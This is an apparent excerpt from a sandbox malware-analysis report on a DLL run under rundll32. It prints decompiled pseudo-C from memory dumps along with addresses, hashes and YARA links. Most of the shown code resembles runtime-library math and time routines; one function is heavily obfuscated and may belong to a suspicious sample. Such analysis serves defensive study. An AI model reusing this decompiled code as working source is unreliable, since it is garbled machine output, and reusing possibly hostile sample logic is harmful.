				_t43 = r14d & 0xffffff00 |  *_t104 != r14b;
				_a24 = _t43;
				if (_t43 == 0) goto 0x535eb475;
				if (E00007FFA7FFA535F1998(_t104,  *((intOrPtr*)(_t125 + 8)), _t122 + 2, _t138) == 0) goto 0x535eb47c;
				goto 0x535eb4a1;
				_t95 =  *((intOrPtr*)(_t125 + 8));
				 *_t95 = r14b;
				_t45 = E00007FFA7FFA535EAA30(_t44);
				 *_t95 = _a16;
				_t46 = E00007FFA7FFA535EAA20(_t45);
				 *_t95 = _a24;
				return _t46;
			}


































                0x7ffa535eb2bc
                0x7ffa535eb2bc
                0x7ffa535eb2bc
                0x7ffa535eb2cf
                0x7ffa535eb2d2
                0x7ffa535eb2d7
                0x7ffa535eb2de
                0x7ffa535eb2e2
                0x7ffa535eb2e5
                0x7ffa535eb2f0
                0x7ffa535eb301
                0x7ffa535eb307
                0x7ffa535eb30e
                0x7ffa535eb311
                0x7ffa535eb31f
                0x7ffa535eb327
                0x7ffa535eb329
                0x7ffa535eb32f
                0x7ffa535eb333
                0x7ffa535eb339
                0x7ffa535eb33e
                0x7ffa535eb34c
                0x7ffa535eb351
                0x7ffa535eb358
                0x7ffa535eb35f
                0x7ffa535eb364
                0x7ffa535eb36e
                0x7ffa535eb374
                0x7ffa535eb37b
                0x7ffa535eb38b
                0x7ffa535eb394
                0x7ffa535eb394
                0x7ffa535eb398
                0x7ffa535eb3ab
                0x7ffa535eb3b1
                0x7ffa535eb3b4
                0x7ffa535eb3b6
                0x7ffa535eb3bd
                0x7ffa535eb3c2
                0x7ffa535eb3c9
                0x7ffa535eb3cb
                0x7ffa535eb3dc
                0x7ffa535eb3df
                0x7ffa535eb3e3
                0x7ffa535eb3e9
                0x7ffa535eb3eb
                0x7ffa535eb3ee
                0x7ffa535eb3f3
                0x7ffa535eb3f5
                0x7ffa535eb3fb
                0x7ffa535eb408
                0x7ffa535eb40b
                0x7ffa535eb40f
                0x7ffa535eb411
                0x7ffa535eb418
                0x7ffa535eb41d
                0x7ffa535eb41f
                0x7ffa535eb425
                0x7ffa535eb42d
                0x7ffa535eb42f
                0x7ffa535eb432
                0x7ffa535eb436
                0x7ffa535eb438
                0x7ffa535eb43f
                0x7ffa535eb444
                0x7ffa535eb448
                0x7ffa535eb451
                0x7ffa535eb454
                0x7ffa535eb459
                0x7ffa535eb471
                0x7ffa535eb473
                0x7ffa535eb475
                0x7ffa535eb479
                0x7ffa535eb47f
                0x7ffa535eb484
                0x7ffa535eb489
                0x7ffa535eb48e
                0x7ffa535eb4a0

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                • String ID: -$:$:$?
                • API String ID: 3440502458-92861585
                • Opcode ID: a800f810628b4c4f7b106cf84e93ca30267a0bac2c5ec4204c3e996c6b5a40af
                • Instruction ID: 756c227052dadb24578371188295bad3d939e5f8e6516c62854f8c487d6c8fc2
                • Opcode Fuzzy Hash: a800f810628b4c4f7b106cf84e93ca30267a0bac2c5ec4204c3e996c6b5a40af
                • Instruction Fuzzy Hash: 22E11532A2CB824EE764CF3194416B9276BFFC6784F4CA175EA4E62A95DF3CE4419700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E9EA0 Relevance: 19.9, APIs: 13, Instructions: 378COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 17%
                			E00007FFA7FFA535E9EA0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags, long long __rbx, signed int* __r8, void* __r10) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t52;
				signed short _t53;
				signed short _t55;
				void* _t63;
				void* _t64;
				void* _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				signed short _t75;
				void* _t76;
				void* _t79;
				void* _t84;
				signed int _t107;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				void* _t117;
				void* _t118;
				signed int _t122;
				void* _t123;
				void* _t137;
				signed long long _t138;
				void* _t165;
				void* _t167;
				void* _t168;
				void* _t171;
				void* _t172;
				void* _t174;
				signed long long _t175;
				void* _t183;
				void* _t186;
				void* _t188;
				void* _t190;

				_t181 = __r10;
				_t140 = __rbx;
				_t112 = __ebp;
				_t137 = _t174;
				 *((long long*)(_t137 + 0x20)) = __rbx;
				_t172 = _t137 - 0x5f;
				_t175 = _t174 - 0xe0;
				asm("movaps [eax-0x48], xmm6");
				asm("movaps [eax-0x58], xmm7");
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				_t138 =  *0x53754140; // 0x9bd95a2971b4
				 *(_t172 - 0x39) = _t138 ^ _t175;
				asm("inc esp");
				asm("movss [esp+0x20], xmm0");
				_t164 = _t175 + 0x20;
				asm("repe inc esp");
				asm("repe inc esp");
				_t53 = E00007FFA7FFA535E9354(_t52, __ebx, __ecx, __rbx, _t175 + 0x28, _t175 + 0x20, _t167, _t190);
				_t107 = _t53 & 0x0000ffff;
				E00007FFA7FFA535E8FAC(_t53, __ecx, 0, _t175 + 0x30, _t175 + 0x20, _t165, _t167, __r8);
				r15d = 0;
				_t111 = _t53 & 0x0000ffff;
				if (__r8 == 0) goto 0x535e9f2e;
				 *__r8 = r15w;
				asm("inc ebp");
				_t115 = _t111;
				if (_t115 != 0) goto 0x535e9f3f;
				asm("inc ebp");
				if (_t115 != 0) goto 0x535e9f3f;
				if (_t115 == 0) goto 0x535e9f7b;
				r14d = 1;
				asm("movss xmm1, [esp+0x20]");
				if (_t107 >= 0) goto 0x535ea340;
				_t117 = ( *(_t175 + 0x28) & 0x0000ffff) - r14w;
				if (_t117 != 0) goto 0x535e9f88;
				asm("ucomiss xmm1, [0x86f92]");
				if (_t117 != 0) goto 0x535e9f6a;
				if (_t117 == 0) goto 0x535e9f7b;
				_t118 = _t111 - r14w;
				if (_t118 != 0) goto 0x535e9f88;
				asm("ucomiss xmm1, [0x86fb5]");
				if (_t118 != 0) goto 0x535e9f88;
				if (_t118 != 0) goto 0x535e9f88;
				asm("movss xmm0, [0x869b1]");
				goto 0x535ea3ae;
				if (r15w - _t107 <= 0) goto 0x535ea340;
				if (r15w - _t111 < 0) goto 0x535ea340;
				if (( *(_t175 + 0x22) & 0x00008000) == 0) goto 0x535e9fc2;
				_t122 = _t111;
				if (_t122 >= 0) goto 0x535e9fc2;
				_t83 = r14d;
				_t55 = E00007FFA7FFA535E90CC( *(_t175 + 0x28) & 0x0000ffff, 0x8000, r14d, 0, _t107, _t138 ^ _t175, _t140, _t175 + 0x30);
				asm("movss xmm0, [0x87c13]");
				goto 0x535ea3ae;
				_t108 = _t107 | 0xffffffff;
				asm("inc ecx");
				if (_t122 <= 0) goto 0x535e9fd1;
				r13d = r15w & 0xffffffff;
				goto 0x535e9ff9;
				asm("xorps xmm1, [0x86978]");
				asm("movss [esp+0x20], xmm1");
				E00007FFA7FFA535E8FAC(_t55, r14d, _t108, _t175 + 0x30, _t175 + 0x20, _t165, _t167, __r8);
				asm("movss xmm1, [esp+0x20]");
				r13d = _t55 & 0x0000ffff;
				asm("movss xmm0, [0x87c0f]");
				asm("comiss xmm0, xmm1");
				if (_t122 <= 0) goto 0x535ea016;
				asm("mulss xmm1, [0x8692a]");
				 *(_t175 + 0x28) = ( *(_t175 + 0x28) & 0x0000ffff) + _t108;
				asm("movaps xmm0, xmm1");
				asm("subss xmm0, [0x86913]");
				asm("addss xmm1, [0x8690b]");
				asm("movaps xmm7, xmm0");
				asm("movss [esp+0x20], xmm0");
				asm("divss xmm7, xmm1");
				asm("movaps xmm6, xmm7");
				asm("mulss xmm6, xmm7");
				asm("movaps xmm0, xmm6");
				E00007FFA7FFA535E9704(( *(_t175 + 0x28) & 0x0000ffff) + _t108);
				asm("movss xmm4, [esp+0x20]");
				asm("inc esp");
				asm("movss xmm5, [0x87c49]");
				asm("movaps xmm3, xmm4");
				asm("inc ecx");
				asm("repe inc esp");
				asm("movd xmm2, eax");
				asm("repe inc esp");
				asm("cvtdq2ps xmm2, xmm2");
				asm("repe inc esp");
				asm("repe inc ecx");
				asm("movaps xmm0, xmm3");
				asm("divss xmm0, xmm5");
				asm("addss xmm0, xmm2");
				asm("mulss xmm1, xmm0");
				asm("movss [esp+0x30], xmm0");
				asm("movss xmm0, [0x87c2d]");
				asm("comiss xmm0, xmm1");
				asm("movss [esp+0x2c], xmm1");
				if (_t122 <= 0) goto 0x535ea0af;
				r14d = r15w & 0xffffffff;
				goto 0x535ea2fa;
				asm("comiss xmm1, [0x87c0a]");
				if (_t122 < 0) goto 0x535ea123;
				asm("movss xmm0, [0x87bec]");
				asm("comiss xmm0, xmm1");
				if (_t122 < 0) goto 0x535ea123;
				asm("inc esp");
				if (_t122 <= 0) goto 0x535ea123;
				asm("movss xmm0, [0x87bdd]");
				asm("inc ecx");
				if (_t122 <= 0) goto 0x535ea123;
				asm("inc esp");
				if (_t122 <= 0) goto 0x535ea0ed;
				asm("subss xmm1, [0x86e0d]");
				goto 0x535ea0f5;
				asm("addss xmm1, [0x86e03]");
				asm("repe inc ecx");
				asm("repe inc esp");
				asm("repe inc ecx");
				asm("inc cx");
				asm("cvtdq2ps xmm0, xmm0");
				asm("subss xmm2, xmm0");
				asm("mulss xmm2, xmm5");
				asm("addss xmm3, xmm2");
				asm("movss [esp+0x2c], xmm3");
				goto 0x535ea2d1;
				asm("comiss xmm1, [0x87b8e]");
				if (_t122 > 0) goto 0x535ea2fa;
				asm("movaps xmm2, xmm4");
				E00007FFA7FFA535E9DF0(0x8000, 4, 4, _t111, __ebp, _t140, _t172 - 0x69, _t175 + 0x20, _t167, _t172, __r10);
				_t16 = _t165 - 2; // 0x2
				_t79 = _t16;
				asm("inc ecx");
				E00007FFA7FFA535E9DF0(_t79, _t79, 4, _t111, __ebp, _t140, _t175 + 0x38, _t164, _t167, _t172, __r10);
				r9d = _t79;
				E00007FFA7FFA535E9B4C(4, _t140, _t172 - 0x69, _t165, _t167, _t172, _t175 + 0x38, _t188, _t186);
				asm("movss xmm2, [ebp-0x69]");
				asm("inc ecx");
				if (_t122 != 0) goto 0x535ea187;
				if (_t122 != 0) goto 0x535ea187;
				asm("inc ecx");
				_t63 = E00007FFA7FFA535E9DF0(_t79, 4, 4, _t111, _t112, _t140, _t172 - 0x59, _t164, _t167, _t172, __r10);
				goto 0x535ea1e8;
				asm("movups xmm0, [0x87a92]");
				asm("movdqu [ebp-0x59], xmm0");
				_t64 = E00007FFA7FFA535E9C0C(_t63, 4, 4, _t111, _t112, _t140, _t172 - 0x59, _t164, __r10);
				r15d = r14d;
				_t168 = _t172 - 0x65;
				asm("movss xmm2, [esi]");
				asm("inc ecx");
				if (_t122 != 0) goto 0x535ea1b1;
				if (_t122 == 0) goto 0x535ea1e5;
				asm("movups xmm0, [0x87a68]");
				asm("movdqu [ebp-0x49], xmm0");
				E00007FFA7FFA535E9C0C(_t64, 4, 4, _t111, _t112, _t140, _t172 - 0x49, _t164, _t181);
				r9d = 4;
				E00007FFA7FFA535E9B4C(4, _t140, _t172 - 0x59, _t165, _t168, _t172, _t172 - 0x49, _t183, _t165);
				r15d = r15d + r14d;
				_t169 = _t168 + _t165;
				_t123 = r15d - 4;
				if (_t123 < 0) goto 0x535ea1a5;
				r15d = 0;
				asm("movd xmm2, eax");
				asm("cvtdq2ps xmm2, xmm2");
				E00007FFA7FFA535E97F8(_t79, r14d, 4, 4, _t111, _t112, _t172 - 0x59, _t164, _t181);
				asm("inc ecx");
				_t69 = E00007FFA7FFA535E9DF0(_t79, _t79, 4, _t111, _t112, _t140, _t172 - 0x69, _t164, _t168 + _t165, _t172, _t181);
				asm("movaps xmm0, [ebp-0x59]");
				asm("movss xmm2, [ebp-0x69]");
				asm("movdqa [ebp-0x79], xmm0");
				_t70 = E00007FFA7FFA535E9C0C(_t69, 4, 4, _t111, _t112, _t140, _t172 - 0x79, _t164, _t181);
				asm("movss xmm2, [ebp-0x65]");
				asm("inc ecx");
				if (_t123 != 0) goto 0x535ea234;
				if (_t123 == 0) goto 0x535ea25a;
				asm("movaps xmm0, [ebp-0x59]");
				asm("movdqa [ebp-0x49], xmm0");
				E00007FFA7FFA535E9C0C(_t70, 4, 4, _t111, _t112, _t140, _t172 - 0x49, _t164, _t181);
				r9d = 4;
				_t72 = E00007FFA7FFA535E9B4C(4, _t140, _t172 - 0x79, _t165, _t168 + _t165, _t172, _t172 - 0x49, _t167, _t171);
				asm("movss xmm1, [ebp-0x79]");
				asm("inc ecx");
				asm("movss [esp+0x20], xmm1");
				if (_t123 != 0) goto 0x535ea26d;
				if (_t123 == 0) goto 0x535ea28d;
				asm("movss xmm2, [ebp-0x75]");
				asm("inc ecx");
				if (_t123 != 0) goto 0x535ea27a;
				if (_t123 == 0) goto 0x535ea28d;
				asm("movss xmm0, [ebp-0x71]");
				asm("addss xmm0, xmm2");
				asm("addss xmm0, xmm1");
				asm("movss [esp+0x20], xmm0");
				E00007FFA7FFA535E8FAC(_t72, r14d, 0, _t175 + 0x20, _t164, _t165, _t168 + _t165, _t172 - 0x49);
				asm("movss xmm2, [esp+0x20]");
				asm("xorps xmm2, [0x866a6]");
				_t74 = E00007FFA7FFA535E9BBC(E00007FFA7FFA535E97F8(_t79, _t83, 4, 4, _t111, _t112, _t172 - 0x79, _t164, _t181), _t164);
				asm("mulss xmm0, [0x879dc]");
				asm("repe inc esp");
				asm("movss [esp+0x2c], xmm0");
				if (__r8 == 0) goto 0x535ea2de;
				 *__r8 = r8w;
				r8d = r15d;
				asm("movss xmm1, [0x8664e]");
				_t75 = E00007FFA7FFA535F0DCC(_t74, _t79, 4, _t112, _t140, _t175 + 0x2c, _t165, _t168 + _t165, _t181);
				asm("movss xmm1, [esp+0x2c]");
				r14d = _t75 & 0x0000ffff;
				_t84 = r14w;
				if (_t84 == 0) goto 0x535ea31c;
				if (_t84 != 1) goto 0x535ea331;
				asm("movss xmm0, [0x878b9]");
				asm("movss [esp+0x2c], xmm0");
				goto 0x535ea326;
				 *(_t175 + 0x2c) =  *(_t175 + 0x2c) & 0x00000000;
				_t76 = E00007FFA7FFA535E90CC(_t75, _t79, 0x10, 4, 4, _t138 ^ _t175, _t140, _t175 + 0x2c);
				asm("movss xmm1, [esp+0x2c]");
				if (r13w == 0) goto 0x535ea34a;
				asm("xorps xmm1, [0x86612]");
				goto 0x535ea34a;
				if (4 != 2) goto 0x535ea34f;
				asm("movaps xmm0, xmm1");
				goto 0x535ea3ae;
				if (_t111 != 2) goto 0x535ea35a;
				asm("inc ecx");
				goto 0x535ea3ae;
				if (4 != r14w) goto 0x535ea41f;
				if (( *(_t175 + 0x22) & 0x00008000) != 0) goto 0x535ea385;
				if (( *(_t172 - 0x7f) & 0x00008000) != 0) goto 0x535ea37f;
				asm("repe inc esp");
				asm("inc ecx");
				goto 0x535ea3ae;
				if (( *(_t172 - 0x7f) & 0x00008000) != 0) goto 0x535ea3ee;
				if (_t111 != 0) goto 0x535ea3a6;
				E00007FFA7FFA535E8FAC(_t76, 0x10, 0xffffffff, _t175 + 0x30, _t164, _t165, _t169, _t172 - 0x49);
				if (_t76 < 0) goto 0x535ea4ad;
				asm("movss xmm0, [0x8781a]");
				E00007FFA7FFA535F51E0();
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ebp");
				asm("inc ebp");
				asm("inc ebp");
				return _t76;
			}








































                0x7ffa535e9ea0
                0x7ffa535e9ea0
                0x7ffa535e9ea0
                0x7ffa535e9ea0
                0x7ffa535e9ea3
                0x7ffa535e9eb2
                0x7ffa535e9eb6
                0x7ffa535e9ebd
                0x7ffa535e9ec1
                0x7ffa535e9ec5
                0x7ffa535e9eca
                0x7ffa535e9ecf
                0x7ffa535e9ed7
                0x7ffa535e9ee1
                0x7ffa535e9ee5
                0x7ffa535e9ee9
                0x7ffa535e9eef
                0x7ffa535e9ef4
                0x7ffa535e9f00
                0x7ffa535e9f0a
                0x7ffa535e9f16
                0x7ffa535e9f19
                0x7ffa535e9f1e
                0x7ffa535e9f21
                0x7ffa535e9f27
                0x7ffa535e9f29
                0x7ffa535e9f2e
                0x7ffa535e9f32
                0x7ffa535e9f35
                0x7ffa535e9f37
                0x7ffa535e9f3b
                0x7ffa535e9f3d
                0x7ffa535e9f44
                0x7ffa535e9f4a
                0x7ffa535e9f53
                0x7ffa535e9f59
                0x7ffa535e9f5d
                0x7ffa535e9f5f
                0x7ffa535e9f66
                0x7ffa535e9f68
                0x7ffa535e9f6a
                0x7ffa535e9f6e
                0x7ffa535e9f70
                0x7ffa535e9f77
                0x7ffa535e9f79
                0x7ffa535e9f7b
                0x7ffa535e9f83
                0x7ffa535e9f8c
                0x7ffa535e9f96
                0x7ffa535e9fa6
                0x7ffa535e9fa8
                0x7ffa535e9fab
                0x7ffa535e9fad
                0x7ffa535e9fb0
                0x7ffa535e9fb5
                0x7ffa535e9fbd
                0x7ffa535e9fc2
                0x7ffa535e9fc5
                0x7ffa535e9fc9
                0x7ffa535e9fcb
                0x7ffa535e9fcf
                0x7ffa535e9fd1
                0x7ffa535e9fdf
                0x7ffa535e9fe5
                0x7ffa535e9fea
                0x7ffa535e9ff0
                0x7ffa535e9ff9
                0x7ffa535ea001
                0x7ffa535ea004
                0x7ffa535ea006
                0x7ffa535ea011
                0x7ffa535ea016
                0x7ffa535ea019
                0x7ffa535ea021
                0x7ffa535ea029
                0x7ffa535ea02c
                0x7ffa535ea032
                0x7ffa535ea036
                0x7ffa535ea039
                0x7ffa535ea03d
                0x7ffa535ea040
                0x7ffa535ea045
                0x7ffa535ea04b
                0x7ffa535ea04f
                0x7ffa535ea057
                0x7ffa535ea05f
                0x7ffa535ea063
                0x7ffa535ea068
                0x7ffa535ea06c
                0x7ffa535ea071
                0x7ffa535ea074
                0x7ffa535ea079
                0x7ffa535ea07e
                0x7ffa535ea081
                0x7ffa535ea085
                0x7ffa535ea089
                0x7ffa535ea08d
                0x7ffa535ea093
                0x7ffa535ea09b
                0x7ffa535ea09e
                0x7ffa535ea0a4
                0x7ffa535ea0a6
                0x7ffa535ea0aa
                0x7ffa535ea0af
                0x7ffa535ea0b6
                0x7ffa535ea0b8
                0x7ffa535ea0c0
                0x7ffa535ea0c3
                0x7ffa535ea0c5
                0x7ffa535ea0cd
                0x7ffa535ea0cf
                0x7ffa535ea0d7
                0x7ffa535ea0db
                0x7ffa535ea0dd
                0x7ffa535ea0e1
                0x7ffa535ea0e3
                0x7ffa535ea0eb
                0x7ffa535ea0ed
                0x7ffa535ea0f5
                0x7ffa535ea0fa
                0x7ffa535ea0ff
                0x7ffa535ea104
                0x7ffa535ea109
                0x7ffa535ea10c
                0x7ffa535ea110
                0x7ffa535ea114
                0x7ffa535ea118
                0x7ffa535ea11e
                0x7ffa535ea123
                0x7ffa535ea12a
                0x7ffa535ea13b
                0x7ffa535ea13e
                0x7ffa535ea143
                0x7ffa535ea143
                0x7ffa535ea146
                0x7ffa535ea151
                0x7ffa535ea156
                0x7ffa535ea164
                0x7ffa535ea169
                0x7ffa535ea16e
                0x7ffa535ea172
                0x7ffa535ea174
                0x7ffa535ea176
                0x7ffa535ea180
                0x7ffa535ea185
                0x7ffa535ea187
                0x7ffa535ea194
                0x7ffa535ea199
                0x7ffa535ea19e
                0x7ffa535ea1a1
                0x7ffa535ea1a5
                0x7ffa535ea1a9
                0x7ffa535ea1ad
                0x7ffa535ea1af
                0x7ffa535ea1b1
                0x7ffa535ea1be
                0x7ffa535ea1c3
                0x7ffa535ea1c8
                0x7ffa535ea1d5
                0x7ffa535ea1da
                0x7ffa535ea1dd
                0x7ffa535ea1e0
                0x7ffa535ea1e3
                0x7ffa535ea1e5
                0x7ffa535ea1f3
                0x7ffa535ea1f7
                0x7ffa535ea1fa
                0x7ffa535ea1ff
                0x7ffa535ea209
                0x7ffa535ea20e
                0x7ffa535ea216
                0x7ffa535ea21d
                0x7ffa535ea222
                0x7ffa535ea227
                0x7ffa535ea22c
                0x7ffa535ea230
                0x7ffa535ea232
                0x7ffa535ea234
                0x7ffa535ea23e
                0x7ffa535ea243
                0x7ffa535ea248
                0x7ffa535ea255
                0x7ffa535ea25a
                0x7ffa535ea25f
                0x7ffa535ea263
                0x7ffa535ea269
                0x7ffa535ea26b
                0x7ffa535ea26d
                0x7ffa535ea272
                0x7ffa535ea276
                0x7ffa535ea278
                0x7ffa535ea27a
                0x7ffa535ea27f
                0x7ffa535ea283
                0x7ffa535ea287
                0x7ffa535ea294
                0x7ffa535ea299
                0x7ffa535ea2a3
                0x7ffa535ea2b7
                0x7ffa535ea2bc
                0x7ffa535ea2c4
                0x7ffa535ea2cb
                0x7ffa535ea2d4
                0x7ffa535ea2d6
                0x7ffa535ea2db
                0x7ffa535ea2de
                0x7ffa535ea2eb
                0x7ffa535ea2f0
                0x7ffa535ea2f6
                0x7ffa535ea2fa
                0x7ffa535ea300
                0x7ffa535ea305
                0x7ffa535ea307
                0x7ffa535ea314
                0x7ffa535ea31a
                0x7ffa535ea31c
                0x7ffa535ea326
                0x7ffa535ea32b
                0x7ffa535ea335
                0x7ffa535ea337
                0x7ffa535ea33e
                0x7ffa535ea348
                0x7ffa535ea34a
                0x7ffa535ea34d
                0x7ffa535ea352
                0x7ffa535ea354
                0x7ffa535ea358
                0x7ffa535ea363
                0x7ffa535ea36e
                0x7ffa535ea374
                0x7ffa535ea376
                0x7ffa535ea37f
                0x7ffa535ea383
                0x7ffa535ea389
                0x7ffa535ea38e
                0x7ffa535ea398
                0x7ffa535ea3a0
                0x7ffa535ea3a6
                0x7ffa535ea3b5
                0x7ffa535ea3c6
                0x7ffa535ea3cb
                0x7ffa535ea3d0
                0x7ffa535ea3d5
                0x7ffa535ea3da
                0x7ffa535ea3ed

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _fdexp_fdlogpoly
                • String ID:
                • API String ID: 4114727879-0
                • Opcode ID: 2849e88e75b85d9acbfc01c0a23c984c94bd6e59bb1f6be8716bfb0e62402709
                • Instruction ID: 5f67408cdf0219c8606eb718ec710c0152b2bcaedf3093fcc1713914f08f279c
                • Opcode Fuzzy Hash: 2849e88e75b85d9acbfc01c0a23c984c94bd6e59bb1f6be8716bfb0e62402709
                • Instruction Fuzzy Hash: 31021626E28F4689F6229B3684410B96367AFEF344F1CE771ED4D324E5EF2CB545A600
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F9C34 Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 661COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 66%
                			E00007FFA7FFA535F9C34() {
				signed int _t334;
				signed int _t365;
				void* _t415;
				void* _t422;
				signed long long _t428;
				signed long long _t430;
				signed long long _t441;
				signed long long _t465;
				long long _t468;
				long long _t469;
				long long _t473;
				intOrPtr _t474;
				long long _t480;
				intOrPtr _t483;
				signed long long _t517;
				void* _t518;
				void* _t568;
				intOrPtr _t569;
				void* _t587;
				signed long long _t588;
				void* _t591;
				void* _t592;
				void* _t593;
				void* _t594;
				void* _t595;
				intOrPtr _t602;
				void* _t605;
				void* _t612;
				signed long long _t613;
				int _t614;
				signed long long _t615;
				signed long long _t616;

				 *(_t592 + 8) = _t517;
				_push(_t588);
				_push(_t587);
				_push(_t613);
				_t593 = _t592 - 0x70;
				_t591 = _t518;
				 *((intOrPtr*)(_t593 + 0x60)) = _t568 - 0x94;
				r14d = _t594 + 0x956;
				r10d = _t605 - 0x1582;
				 *((intOrPtr*)(_t593 + 0xb8)) = _t568 - 0x40c;
				 *((intOrPtr*)(_t593 + 0xc8)) =  *((intOrPtr*)(_t593 + 0xe0)) + 0x761;
				r11d = _t568 - 0x15fd;
				 *((intOrPtr*)(_t593 + 0xe0)) = _t568 - 0x54f;
				r9d = r9d + 0xfffffd9e;
				 *((intOrPtr*)(_t593 + 0xc0)) =  *((intOrPtr*)(_t593 + 0xf8)) + 0xffffe932;
				r8d = r10d;
				 *((intOrPtr*)(_t593 + 0x50)) = r11d;
				 *(_t593 + 0x5c) = r9d;
				 *((intOrPtr*)(_t593 + 0x64)) = _t422 - 0xfec;
				 *((intOrPtr*)(_t593 + 0xe8)) = _t568 - 0xe8;
				r15d = _t568 - 0x176;
				r13d = _t568 - 0x2a8;
				if (r11d == _t615 - 0x70) goto 0x535fa66f;
				r15d = 0x12ad;
				_t27 = _t588 + 0x7b; // 0x15fd
				r12d = _t27;
				if (r13d - _t517 + 0x6f2 < 0) goto 0x535f9efc;
				_t29 = _t517 - 0x70; // 0x1ad7
				r9d = _t29;
				r8d = 0x1fda;
				 *((long long*)(_t593 + 0x40)) = 0x535fc300;
				 *((char*)(_t593 + 0x38)) = 0x93;
				 *((char*)(_t593 + 0x30)) = 0x2d;
				 *((intOrPtr*)(_t593 + 0x28)) = 5;
				 *(_t593 + 0x20) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x110)) + 0x68)) - 0x12e2;
				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(r15d, _t517, _t591, _t568);
				_t37 = _t517 + 0x60; // 0x1ba7
				r9d = _t37;
				r8d = 0x145c;
				 *(_t591 + 0x1b8) = 0x535fc300;
				 *((long long*)(_t593 + 0x40)) = 0x53603760;
				 *((char*)(_t593 + 0x38)) = 0xf9;
				 *((char*)(_t593 + 0x30)) = 0x4a;
				 *((intOrPtr*)(_t593 + 0x28)) =  *((intOrPtr*)(_t591 + 0x70)) - 0x1482;
				 *(_t593 + 0x20) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x160)) + 0x1b0)) + 0x6a446;
				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(0x1582, _t517, _t591, _t568);
				_t48 = _t517 + 0x60; // 0x1ba7
				r9d = _t48;
				r8d = 0x1b47;
				 *(_t591 + 0x1b8) = 0x53603760;
				_t428 =  *((intOrPtr*)(_t591 + 0x108));
				 *(_t428 + 0x80) =  *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x5e8) | _t613;
				 *((long long*)(_t593 + 0x40)) = 0x536a2090;
				 *((char*)(_t593 + 0x38)) = 0x3b;
				 *((char*)(_t593 + 0x30)) = 0x62;
				 *((intOrPtr*)(_t593 + 0x28)) = 4;
				 *(_t593 + 0x20) =  *((intOrPtr*)(_t591 + 0x340)) + 0xb0ea7;
				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(0x651, _t517, _t591, _t568);
				r9d = 0x145c;
				 *(_t591 + 0x1b8) = _t428;
				r8d = r12d;
				 *((long long*)(_t593 + 0x40)) = 0x5367c070;
				_t430 =  *((intOrPtr*)(_t591 + 0x108)) + 0x3c0;
				 *(_t591 + 0x300) = _t430;
				 *((char*)(_t593 + 0x38)) = 0x67;
				 *((char*)(_t593 + 0x30)) = 0xb6;
				 *((intOrPtr*)(_t593 + 0x28)) =  *((intOrPtr*)(_t591 + 0x1b0)) - 0x1fd7;
				 *(_t593 + 0x20) = 0x26020;
				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(0x1355, _t517, _t591, _t568);
				 *(_t591 + 0x1b8) = _t430;
				 *((long long*)(_t593 + 0x40)) = 0x535ffe30;
				 *((char*)(_t593 + 0x38)) = 0x6c;
				r9d = 0x145c;
				 *((char*)(_t593 + 0x30)) = 0x22;
				r8d = 0x1b47;
				 *((intOrPtr*)(_t593 + 0x28)) = 8;
				 *(_t593 + 0x20) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x240)) + 0x1b0)) + 0x1956;
				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(0x16ce, _t517, _t591, _t568);
				r12d = 0x10ae;
				 *(_t591 + 0x1b8) =  *((intOrPtr*)(_t591 + 0x45c));
				r9d = 0x1b47;
				r8d = 0x1355;
				 *((long long*)(_t593 + 0x40)) = 0x535fe190;
				 *((char*)(_t593 + 0x38)) = 0xbe;
				 *((char*)(_t593 + 0x30)) = 0xfa;
				 *((intOrPtr*)(_t593 + 0x28)) =  *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x70) - 0x147f;
				 *(_t593 + 0x20) = 0x1c98;
